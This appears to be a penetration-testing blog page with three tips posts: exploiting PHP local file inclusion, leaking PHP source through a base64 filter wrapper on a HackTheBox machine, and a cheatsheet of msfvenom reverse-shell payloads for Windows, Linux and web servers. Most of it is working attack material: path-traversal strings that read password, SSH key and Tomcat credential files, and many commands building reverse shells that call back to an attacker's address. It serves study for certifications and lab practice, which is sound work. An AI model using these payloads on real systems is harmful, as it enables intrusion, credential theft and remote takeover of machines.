Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks, WebApp 101

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page.

In this example, we’ll be using FRIENDZONE on HackTheBox.


Confirming LFI on our example

At the following URL, we found that we have LFI capabilities on the ?pagename parameter. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a php page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a php page named timestamp.php.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp


Using Base64 Encoding to View Source Code

We can specify the following PHP Wrapper to encode a file in Base64.

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI, and specify the file we want to view the contents of (login.php)
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, let’s copy that returned Base64 and run the following command within Kali.

echo -n <Base64> | base64 -d

The results show us the source code of login.php! We could also rerun the above command with > login.php appended to save our own file.


That’s it! Super simple.

Tips & Tricks

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)


There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP.

Table of Contents:
– Non Meterpreter Binaries
– Non Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads


Non-Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86 msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

aspmsfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
phpmsfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Donations and Support:
Like my content? Please consider supporting me on Patreon:
https://www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link
https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins

👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇
https://www.youtube.com/c/infinitelogins?sub_confirmation=1